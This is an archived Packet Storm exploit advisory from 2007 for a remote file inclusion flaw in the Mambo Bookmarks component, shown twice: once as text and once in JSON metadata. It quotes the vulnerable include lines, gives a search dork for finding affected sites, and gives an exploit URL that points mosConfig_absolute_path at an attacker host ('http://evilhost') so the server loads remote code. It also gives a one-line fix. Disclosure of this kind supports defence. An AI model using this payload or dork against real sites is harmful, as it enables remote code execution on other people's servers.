Search...

mambobm.rfi.txt

2007-08-14T00:00:00

ID PACKETSTORM:58507
Type packetstorm
Reporter vitux
Modified 2007-08-14T00:00:00

Description

                                        
                                            `Application : Bookmarks - mambo Component  
  
URL :  
http://mamboxchange.com/frs/download.php/4274/MOS_Com_Bookmarks25-Final_a.zip  
  
Variable $mosConfig_absolute_path not sanitized: xpl works with  
register_globals=on  
in components/com_bookmarks/bookmarks_export.php on line 22,27,29  
  
$require_once( $mosConfig_absolute_path . "/includes/mambo.php" );  
$include_once($mosConfig_absolute_path.'/components/com_bookmarks/language/'  
. $mosConfig_lang . '.php');  
$include_once($mosConfig_absolute_path.'/components/com_bookmarks/language/english.php');  
  
Exploit:  
~~~~~~~~  
  
dork: "com_bookmarks"  
  
http://www.vuln.com/components/com_bookmarks/bookmarks_export.php?mosConfig_absolute_path=http://evilhost  
  
Fix  
~~~~  
  
Add before code:  
defined('_VALID_MOS') or die('Direct access to this location is not  
allowed.');  
  
Discovered By : vitux  
Thanks To : #indolinux@dal.net, #sunda@dal.net, #batamhacker@  
dal.net, #malanghackerlink@dal.net  
special To : donny indocom, eko indocom, ^BLaCk_BaNDitS^, urang  
subang sadaya, pokona mah kabeh lah  
mail : vitux.manis@gmail.com, pipit_subang@yahoo.com  
  
# cilacap 12th august 2007  
`

JSON Vulners Source

Initial Source

{"type": "packetstorm", "published": "2007-08-14T00:00:00", "reporter": "vitux", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "9cdb59fec5b48a1243d9c4875cf02939"}, {"key": "modified", "hash": "2e8c76100b575854c55c01e544b07ef1"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "2e8c76100b575854c55c01e544b07ef1"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "7e8183d579498297991b5307d2664ce5"}, {"key": "sourceData", "hash": "6599d9c932cac997350ea9a4f6d8b850"}, {"key": "sourceHref", "hash": "a08dfb9f58fdbefbf6112b408b9e01d4"}, {"key": "title", "hash": "29c9253c88776f79fad5c21e2cbf410f"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`Application : Bookmarks - mambo Component \n \nURL : \nhttp://mamboxchange.com/frs/download.php/4274/MOS_Com_Bookmarks25-Final_a.zip \n \nVariable $mosConfig_absolute_path not sanitized: xpl works with \nregister_globals=on \nin components/com_bookmarks/bookmarks_export.php on line 22,27,29 \n \n$require_once( $mosConfig_absolute_path . \"/includes/mambo.php\" ); \n$include_once($mosConfig_absolute_path.'/components/com_bookmarks/language/' \n. $mosConfig_lang . '.php'); \n$include_once($mosConfig_absolute_path.'/components/com_bookmarks/language/english.php'); \n \nExploit: \n~~~~~~~~ \n \ndork: \"com_bookmarks\" \n \nhttp://www.vuln.com/components/com_bookmarks/bookmarks_export.php?mosConfig_absolute_path=http://evilhost \n \nFix \n~~~~ \n \nAdd before code: \ndefined('_VALID_MOS') or die('Direct access to this location is not \nallowed.'); \n \nDiscovered By : vitux \nThanks To : #indolinux@dal.net, #sunda@dal.net, #batamhacker@ \ndal.net, #malanghackerlink@dal.net \nspecial To : donny indocom, eko indocom, ^BLaCk_BaNDitS^, urang \nsubang sadaya, pokona mah kabeh lah \nmail : vitux.manis@gmail.com, pipit_subang@yahoo.com \n \n# cilacap 12th august 2007 \n`\n", "viewCount": 2, "history": [], "lastseen": "2016-11-03T10:17:08", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/58507/mambobm.rfi.txt.html", "sourceHref": "https://packetstormsecurity.com/files/download/58507/mambobm.rfi.txt", "title": "mambobm.rfi.txt", "enchantments": {"score": {"vector": "NONE", "value": 5.0}, "vulnersScore": 5.0}, "references": [], "id": "PACKETSTORM:58507", "hash": "ab8bc9e81c3bf9ca360da9212f2bc9a89f4fc02cf36e4e6f829c578ce288d90f", "edition": 1, "cvelist": [], "modified": "2007-08-14T00:00:00", "description": ""}